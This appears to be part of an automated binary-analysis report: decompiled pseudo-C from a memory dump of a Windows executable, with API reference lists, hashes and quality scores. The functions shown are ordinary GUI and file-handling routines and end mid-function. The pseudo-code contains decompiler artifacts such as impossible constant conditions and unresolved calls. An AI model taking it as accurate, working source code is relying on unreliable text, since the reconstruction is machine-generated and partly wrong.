                                                                        				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
                                                                        				}
                                                                        				_t78 =  *((intOrPtr*)(_t161 + 0x198));
                                                                        				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
                                                                        					L17:
                                                                        					_t79 =  *(_t161 + 0x19c);
                                                                        					if(_t79 == 0) {
                                                                        						L27:
                                                                        						return _t79;
                                                                        					}
                                                                        					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
                                                                        					if(_t79 < 0) {
                                                                        						goto L27;
                                                                        					}
                                                                        					_v44.right = _t79 + 1;
                                                                        					_t159 = 0;
                                                                        					do {
                                                                        						_t79 = E00414208( *(_t161 + 0x19c), _t159);
                                                                        						_t135 = _t79;
                                                                        						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
                                                                        							_v44.left = CreateSolidBrush(E0041EFA4(0x80000010));
                                                                        							E00412BCC( *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
                                                                        							FrameRect(_t162,  &_v44, _v44);
                                                                        							DeleteObject(_v60.right);
                                                                        							_v60.left = CreateSolidBrush(E0041EFA4(0x80000014));
                                                                        							E00412BCC( *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
                                                                        							FrameRect(_t162,  &_v60, _v60);
                                                                        							_t79 = DeleteObject(_v68);
                                                                        						}
                                                                        						_t159 = _t159 + 1;
                                                                        						_t75 =  &(_v44.right);
                                                                        						 *_t75 = _v44.right - 1;
                                                                        					} while ( *_t75 != 0);
                                                                        					goto L27;
                                                                        				}
                                                                        				_t160 = 0;
                                                                        				if(_t134 != 0) {
                                                                        					_t160 = E00414264(_t78, _t134);
                                                                        					if(_t160 < 0) {
                                                                        						_t160 = 0;
                                                                        					}
                                                                        				}
                                                                        				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
                                                                        				if(_t160 <  *_t163) {
                                                                        					do {
                                                                        						_t136 = E00414208( *((intOrPtr*)(_t161 + 0x198)), _t160);
                                                                        						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
                                                                        							E00412BCC( *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
                                                                        							if(RectVisible(_t162,  &(_v44.top)) != 0) {
                                                                        								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
                                                                        									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
                                                                        								}
                                                                        								_v60.top = SaveDC(_t162);
                                                                        								E00434EE8(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
                                                                        								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
                                                                        								E00437760(_t136, _t162, 0xf, 0);
                                                                        								RestoreDC(_t162, _v80);
                                                                        								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
                                                                        							}
                                                                        						}
                                                                        						_t160 = _t160 + 1;
                                                                        					} while (_t160 < _v60.top);
                                                                        				}
                                                                        			}

















                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                        • String ID:
                                                                        • API String ID: 375863564-0
                                                                        • Opcode ID: a339bbe9dbde8620f25859f2c879bc2d89aaec14b1b7b84054d5a770207a83ca
                                                                        • Instruction ID: 0b65945d901311baf0f71d7817378dc12ba5f118a77a7d6de250862080b77c6d
                                                                        • Opcode Fuzzy Hash: a339bbe9dbde8620f25859f2c879bc2d89aaec14b1b7b84054d5a770207a83ca
                                                                        • Instruction Fuzzy Hash: A4516F712042449FD714DF29C8C4B5B77E9AF88308F04445EFE86CB296D639E891CB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 70%
                                                                        			E00402B40(void** __eax) {
                                                                        				long _t29;
                                                                        				void* _t31;
                                                                        				long _t34;
                                                                        				void* _t38;
                                                                        				void* _t40;
                                                                        				long _t41;
                                                                        				int _t44;
                                                                        				void* _t46;
                                                                        				long _t54;
                                                                        				long _t55;
                                                                        				void* _t58;
                                                                        				void** _t59;
                                                                        				DWORD* _t60;
                                                                        
                                                                        				_t59 = __eax;
                                                                        				 *((intOrPtr*)(__eax + 0xc)) = 0;
                                                                        				 *((intOrPtr*)(__eax + 0x10)) = 0;
                                                                        				if(0xffffffffffff284f == 0) {
                                                                        					_t29 = 0x80000000;
                                                                        					_t55 = 1;
                                                                        					_t54 = 3;
                                                                        					 *((intOrPtr*)(__eax + 0x1c)) = 0x402a94;
                                                                        				} else {
                                                                        					if(0xffffffffffff284f == 0) {
                                                                        						_t29 = 0x40000000;
                                                                        						_t55 = 1;
                                                                        						_t54 = 2;
                                                                        					} else {
                                                                        						if(0xffffffffffff284f != 0) {
                                                                        							return 0xffffffffffff284d;
                                                                        						}
                                                                        						_t29 = 0xc0000000;
                                                                        						_t55 = 1;
                                                                        						_t54 = 3;
                                                                        					}
                                                                        					_t59[7] = E00402AD4;
                                                                        				}
                                                                        				_t59[9] = E00402B20;
                                                                        				_t59[8] = E00402AD0;
                                                                        				if(_t59[0x12] == 0) {
                                                                        					_t59[2] = 0x80;
                                                                        					_t59[9] = E00402AD0;
                                                                        					_t59[5] =  &(_t59[0x53]);
                                                                        					if(_t59[1] == 0xd7b2) {
                                                                        						if(_t59 != 0x4963e4) {
                                                                        							_push(0xfffffff5);
                                                                        						} else {
                                                                        							_push(0xfffffff4);
                                                                        						}
                                                                        					} else {
                                                                        						_push(0xfffffff6);
                                                                        					}
                                                                        					_t31 = GetStdHandle();
                                                                        					if(_t31 == 0xffffffff) {
                                                                        						goto L37;
                                                                        					}
                                                                        					 *_t59 = _t31;
                                                                        					goto L30;
                                                                        				} else {
                                                                        					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
                                                                        					if(_t38 == 0xffffffff) {
                                                                        						L37:
                                                                        						_t59[1] = 0xd7b0;
                                                                        						return GetLastError();
                                                                        					}
                                                                        					 *_t59 = _t38;
                                                                        					if(_t59[1] != 0xd7b3) {
                                                                        						L30:
                                                                        						if(_t59[1] == 0xd7b1) {
                                                                        							L34:
                                                                        							return 0;
                                                                        						}
                                                                        						_t34 = GetFileType( *_t59);
                                                                        						if(_t34 == 0) {
                                                                        							CloseHandle( *_t59);
                                                                        							_t59[1] = 0xd7b0;
                                                                        							return 0x69;
                                                                        						}
                                                                        						if(_t34 == 2) {
                                                                        							_t59[8] = E00402AD4;
                                                                        						}
                                                                        						goto L34;
                                                                        					}
                                                                        					_t59[1] = _t59[1] - 1;
                                                                        					_t40 = GetFileSize( *_t59, 0) + 1;
                                                                        					if(_t40 == 0) {
                                                                        						goto L37;
                                                                        					}
                                                                        					_t41 = _t40 - 0x81;
                                                                        					if(_t41 < 0) {
                                                                        						_t41 = 0;
                                                                        					}
                                                                        					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
                                                                        						goto L37;
                                                                        					} else {
                                                                        						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
                                                                        						_t58 = 0;
                                                                        						if(_t44 != 1) {
                                                                        							goto L37;
                                                                        						}
                                                                        						_t46 = 0;
                                                                        						while(_t46 < _t58) {
                                                                        							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
                                                                        								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
                                                                        									goto L37;
                                                                        								} else {
                                                                        									goto L30;
                                                                        								}
                                                                        							}
                                                                        							_t46 = _t46 + 1;
                                                                        						}
                                                                        						goto L30;
                                                                        					}
                                                                        				}
                                                                        			}

















                                                                        APIs
                                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BC8
                                                                        • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BEC
                                                                        • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402C08
                                                                        • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402C29
                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402C52
                                                                        • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402C60
                                                                        • GetStdHandle.KERNEL32(000000F5), ref: 00402C9B
                                                                        • GetFileType.KERNEL32(?,000000F5), ref: 00402CB1
                                                                        • CloseHandle.KERNEL32(?,?,000000F5), ref: 00402CCC
                                                                        • GetLastError.KERNEL32(000000F5), ref: 00402CE4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                        • String ID:
                                                                        • API String ID: 1694776339-0
                                                                        • Opcode ID: 9aee0fbc78375ed4c045fe708eee76b85e86ea9ef32a4d9543f669cd10d059a6
                                                                        • Instruction ID: 72d0798c9f897f459679b6debe79a3b22e66610cb6c7dbc6d0f179f518ddef03
                                                                        • Opcode Fuzzy Hash: 9aee0fbc78375ed4c045fe708eee76b85e86ea9ef32a4d9543f669cd10d059a6
                                                                        • Instruction Fuzzy Hash: 07418270108700AAF7309F248B0D72B76A5EB00754F248E3FE096BA6E0D6FDA885975D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00451F78(intOrPtr _a4) {
                                                                        				intOrPtr _t27;
                                                                        				struct HMENU__* _t48;
                                                                        
                                                                        				_t27 =  *((intOrPtr*)(_a4 - 4));
                                                                        				if( *((char*)(_t27 + 0x229)) != 0) {
                                                                        					_t27 =  *((intOrPtr*)(_a4 - 4));
                                                                        					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
                                                                        						_t27 =  *((intOrPtr*)(_a4 - 4));
                                                                        						if( *((char*)(_t27 + 0x22f)) != 1) {
                                                                        							_t48 = GetSystemMenu(E0043CC2C( *((intOrPtr*)(_a4 - 4))), 0);
                                                                        							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
                                                                        								DeleteMenu(_t48, 0xf130, 0);
                                                                        								DeleteMenu(_t48, 7, 0x400);
                                                                        								DeleteMenu(_t48, 5, 0x400);
                                                                        								DeleteMenu(_t48, 0xf030, 0);
                                                                        								DeleteMenu(_t48, 0xf020, 0);
                                                                        								DeleteMenu(_t48, 0xf000, 0);
                                                                        								return DeleteMenu(_t48, 0xf120, 0);
                                                                        							}
                                                                        							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
                                                                        								EnableMenuItem(_t48, 0xf020, 1);
                                                                        							}
                                                                        							_t27 =  *((intOrPtr*)(_a4 - 4));
                                                                        							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
                                                                        								return EnableMenuItem(_t48, 0xf030, 1);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t27;
                                                                        			}






                                                                        APIs
                                                                        • GetSystemMenu.USER32(00000000,00000000), ref: 00451FC3
                                                                        • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00451FE1
                                                                        • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00451FEE
                                                                        • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00451FFB
                                                                        • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00452008
                                                                        • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00452015
                                                                        • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00452022
                                                                        • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0045202F
                                                                        • EnableMenuItem.USER32 ref: 0045204D
                                                                        • EnableMenuItem.USER32 ref: 00452069
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Menu$Delete$EnableItem$System
                                                                        • String ID:
                                                                        • API String ID: 3985193851-0
                                                                        • Opcode ID: 9e79a2f5eae3ced763728648782822ab3c69376b2aa35a37c87e7f7102866a52
                                                                        • Instruction ID: bab5879344c1d3096d848326a20f741e7fadc53448dec7e96ea0f2bec2258502
                                                                        • Opcode Fuzzy Hash: 9e79a2f5eae3ced763728648782822ab3c69376b2aa35a37c87e7f7102866a52
                                                                        • Instruction Fuzzy Hash: 0F214F703413047AE730AA64CD8EF5A7BE95F05B19F1540A6BA097F2D3C6F9B990861C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E00433F38(intOrPtr __eax, void* __ecx, char _a4) {
                                                                        				char _v5;
                                                                        				char _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _v20;
                                                                        				struct HWND__* _v24;
                                                                        				intOrPtr _v28;
                                                                        				char _v32;
                                                                        				struct tagRECT _v48;
                                                                        				struct tagRECT _v64;
                                                                        				struct HWND__* _t53;
                                                                        				intOrPtr _t55;
                                                                        				intOrPtr _t60;
                                                                        				intOrPtr _t65;
                                                                        				intOrPtr _t78;
                                                                        				intOrPtr _t84;
                                                                        				intOrPtr _t86;
                                                                        				intOrPtr _t93;
                                                                        				intOrPtr _t98;
                                                                        				intOrPtr _t101;
                                                                        				void* _t102;
                                                                        				intOrPtr* _t104;
                                                                        				intOrPtr _t106;
                                                                        				intOrPtr _t110;
                                                                        				intOrPtr _t112;
                                                                        				struct HWND__* _t113;
                                                                        				intOrPtr _t114;
                                                                        				intOrPtr _t116;
                                                                        				intOrPtr _t117;
                                                                        
                                                                        				_t102 = __ecx;
                                                                        				_t101 = __eax;
                                                                        				_v5 = 1;
                                                                        				_t2 =  &_a4; // 0x434259
                                                                        				_t113 = E00434370( *_t2 + 0xfffffff7);
                                                                        				_v24 = _t113;
                                                                        				_t53 = GetWindow(_t113, 4);
                                                                        				_t104 =  *0x495ad0; // 0x496c04
                                                                        				if(_t53 ==  *((intOrPtr*)( *_t104 + 0x30))) {
                                                                        					L6:
                                                                        					if(_v24 == 0) {
                                                                        						L25:
                                                                        						return _v5;
                                                                        					}
                                                                        					_t114 = _t101;
                                                                        					while(1) {
                                                                        						_t55 =  *((intOrPtr*)(_t114 + 0x30));
                                                                        						if(_t55 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t114 = _t55;
                                                                        					}
                                                                        					_t112 = E0043CC2C(_t114);
                                                                        					_v28 = _t112;
                                                                        					if(_t112 == _v24) {
                                                                        						goto L25;
                                                                        					}
                                                                        					_t12 =  &_a4; // 0x434259
                                                                        					_t60 =  *((intOrPtr*)( *((intOrPtr*)( *_t12 - 0x10)) + 0x30));
                                                                        					if(_t60 == 0) {
                                                                        						_t18 =  &_a4; // 0x434259
                                                                        						_t106 =  *0x4323f0; // 0x43243c
                                                                        						__eflags = E00403768( *((intOrPtr*)( *_t18 - 0x10)), _t106);
                                                                        						if(__eflags == 0) {
                                                                        							__eflags = 0;
                                                                        							_v32 = 0;
                                                                        						} else {
                                                                        							_t20 =  &_a4; // 0x434259
                                                                        							_v32 = E0043CC2C( *((intOrPtr*)( *_t20 - 0x10)));
                                                                        						}
                                                                        						L19:
                                                                        						_v12 = 0;
                                                                        						_t65 = _a4;
                                                                        						_v20 =  *((intOrPtr*)(_t65 - 9));
                                                                        						_v16 =  *((intOrPtr*)(_t65 - 5));
                                                                        						_push( &_v32);
                                                                        						_push(E00433ECC);
                                                                        						_push(GetCurrentThreadId());
                                                                        						L00406E3C();
                                                                        						_t126 = _v12;
                                                                        						if(_v12 == 0) {
                                                                        							goto L25;
                                                                        						}
                                                                        						GetWindowRect(_v24,  &_v48);
                                                                        						_push(_a4 + 0xfffffff7);
                                                                        						_push(_a4 - 1);
                                                                        						E004037D8(_t101, _t126);
                                                                        						_t78 =  *0x496b8c; // 0x0
                                                                        						_t110 =  *0x4311cc; // 0x431218
                                                                        						if(E00403768(_t78, _t110) == 0) {
                                                                        							L23:
                                                                        							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
                                                                        								_v5 = 0;
                                                                        							}
                                                                        							goto L25;
                                                                        						}
                                                                        						_t84 =  *0x496b8c; // 0x0
                                                                        						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x38)) + 0xa0)) == 0) {
                                                                        							goto L23;
                                                                        						}
                                                                        						_t86 =  *0x496b8c; // 0x0
                                                                        						if(E0043CC2C( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x38)) + 0xa0))) == _v24) {
                                                                        							goto L25;
                                                                        						}
                                                                        						goto L23;
                                                                        					}
                                                                        					_t116 = _t60;
                                                                        					while(1) {
                                                                        						_t93 =  *((intOrPtr*)(_t116 + 0x30));
                                                                        						if(_t93 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t116 = _t93;
                                                                        					}
                                                                        					_v32 = E0043CC2C(_t116);
                                                                        					goto L19;
                                                                        				}
                                                                        				_t117 = E004334C0(_v24, _t102);
                                                                        				if(_t117 == 0) {
                                                                        					goto L25;
                                                                        				} else {
                                                                        					while(1) {
                                                                        						_t98 =  *((intOrPtr*)(_t117 + 0x30));
                                                                        						if(_t98 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t117 = _t98;
                                                                        					}
                                                                        					_v24 = E0043CC2C(_t117);
                                                                        					goto L6;
                                                                        				}
                                                                        			}































                                                                        0x00000000
                                                                        0x00433fe3
                                                                        0x00433f74
                                                                        0x00433f78
                                                                        0x00000000
                                                                        0x00433f7e
                                                                        0x00433f82
                                                                        0x00433f82
                                                                        0x00433f87
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00433f80
                                                                        0x00433f80
                                                                        0x00433f90
                                                                        0x00000000
                                                                        0x00433f90

                                                                        APIs
                                                                          • Part of subcall function 00434370: WindowFromPoint.USER32(YBC,?,00000000,00433F52,?,-0000000C,?), ref: 00434376
                                                                          • Part of subcall function 00434370: GetParent.USER32(00000000), ref: 0043438D
                                                                        • GetWindow.USER32(00000000,00000004), ref: 00433F5A
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0043402E
                                                                        • 72E7AC10.USER32(00000000,00433ECC,?,00000000,00000004,?,-0000000C,?), ref: 00434034
                                                                        • GetWindowRect.USER32 ref: 0043404B
                                                                        • IntersectRect.USER32 ref: 004340B9
                                                                          • Part of subcall function 004334C0: GlobalFindAtomA.KERNEL32 ref: 004334D4
                                                                          • Part of subcall function 004334C0: GetPropA.USER32 ref: 004334EB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$Rect$AtomCurrentFindFromGlobalIntersectParentPointPropThread
                                                                        • String ID: <$C$YBC$YBC
                                                                        • API String ID: 2329882401-525053330
                                                                        • Opcode ID: 67c238a949be0a3692a05650b6b0dd3817a18a1ea391561a0b0d11e4fad90527
                                                                        • Instruction ID: c79d42cd8e63d5d6ca071abcab3a340e76f0d134036ba66e97feda9ca407d93a
                                                                        • Opcode Fuzzy Hash: 67c238a949be0a3692a05650b6b0dd3817a18a1ea391561a0b0d11e4fad90527
                                                                        • Instruction Fuzzy Hash: 4D516D75B00209AFCB10DF69C484AAEB7F4AF48358F105566F914EB391D739EE01CB99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004361C8(intOrPtr* __eax, int __ecx, int __edx) {
                                                                        				char _t62;
                                                                        				signed int _t64;
                                                                        				signed int _t65;
                                                                        				signed char _t107;
                                                                        				intOrPtr _t113;
                                                                        				intOrPtr _t114;
                                                                        				int _t117;
                                                                        				intOrPtr* _t118;
                                                                        				int _t119;
                                                                        				int* _t121;
                                                                        
                                                                        				 *_t121 = __ecx;
                                                                        				_t117 = __edx;
                                                                        				_t118 = __eax;
                                                                        				if(__edx ==  *_t121) {
                                                                        					L29:
                                                                        					_t62 =  *0x436374; // 0x0
                                                                        					 *((char*)(_t118 + 0x98)) = _t62;
                                                                        					return _t62;
                                                                        				}
                                                                        				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
                                                                        					_t107 =  *0x43636c; // 0x1f
                                                                        				} else {
                                                                        					_t107 =  *((intOrPtr*)(__eax + 0x98));
                                                                        				}
                                                                        				if((_t107 & 0x00000001) == 0) {
                                                                        					_t119 =  *(_t118 + 0x40);
                                                                        				} else {
                                                                        					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
                                                                        				}
                                                                        				if((_t107 & 0x00000002) == 0) {
                                                                        					_t121[1] =  *(_t118 + 0x44);
                                                                        				} else {
                                                                        					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
                                                                        				}
                                                                        				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
                                                                        					_t64 =  *(_t118 + 0x48);
                                                                        					_t121[2] = _t64;
                                                                        				} else {
                                                                        					if((_t107 & 0x00000001) == 0) {
                                                                        						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
                                                                        						_t121[2] = _t64;
                                                                        					} else {
                                                                        						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
                                                                        						_t121[2] = _t64;
                                                                        					}
                                                                        				}
                                                                        				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
                                                                        				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
                                                                        					_t121[3] =  *(_t118 + 0x4c);
                                                                        				} else {
                                                                        					if(_t65 == 0) {
                                                                        						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
                                                                        					} else {
                                                                        						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
                                                                        					}
                                                                        				}
                                                                        				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
                                                                        				_t113 =  *0x436374; // 0x0
                                                                        				if(_t113 != (_t107 &  *0x436370)) {
                                                                        					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
                                                                        				}
                                                                        				_t114 =  *0x436374; // 0x0
                                                                        				if(_t114 != (_t107 &  *0x436378)) {
                                                                        					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
                                                                        				}
                                                                        				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
                                                                        					E0041F704( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E0041F6E8( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
                                                                        				}
                                                                        				goto L29;
                                                                        			}














                                                                        APIs
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 00436201
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 0043621B
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 00436249
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 0043625F
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 00436297
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 004362AF
                                                                        • MulDiv.KERNEL32(?,?,0000001F), ref: 004362F9
                                                                        • MulDiv.KERNEL32(?,?,0000001F), ref: 00436322
                                                                        • MulDiv.KERNEL32(00000000,?,0000001F), ref: 00436348
                                                                          • Part of subcall function 0041F704: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041F711
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 12406acec0809dd684b2cbdaf37a1cf72947fcd2106aa20a73bdfab1a9d6afc8
                                                                        • Instruction ID: 5572a461d4d5c649957c28d46cd97aeae1e5ffce9261f6d8a18b716679afef8d
                                                                        • Opcode Fuzzy Hash: 12406acec0809dd684b2cbdaf37a1cf72947fcd2106aa20a73bdfab1a9d6afc8
                                                                        • Instruction Fuzzy Hash: 9C517070204341AFC720EB69C845B6BBBF9AF4D304F06985EB9D6D7352C639E844CB25
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 37%
                                                                        			E00437068(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                        				char _v5;
                                                                        				struct HDC__* _v12;
                                                                        				struct HDC__* _v16;
                                                                        				void* _v20;
                                                                        				intOrPtr _v24;
                                                                        				intOrPtr _v28;
                                                                        				int _v32;
                                                                        				int _v36;
                                                                        				struct HDC__* _t33;
                                                                        				intOrPtr _t72;
                                                                        				int _t74;
                                                                        				intOrPtr _t80;
                                                                        				int _t83;
                                                                        				void* _t88;
                                                                        				int _t89;
                                                                        				void* _t92;
                                                                        				void* _t93;
                                                                        				intOrPtr _t94;
                                                                        
                                                                        				_t92 = _t93;
                                                                        				_t94 = _t93 + 0xffffffe0;
                                                                        				_v5 = __ecx;
                                                                        				_t74 =  *((intOrPtr*)( *__edx + 0x38))();
                                                                        				if(_v5 == 0) {
                                                                        					_push(__edx);
                                                                        					asm("movsd");
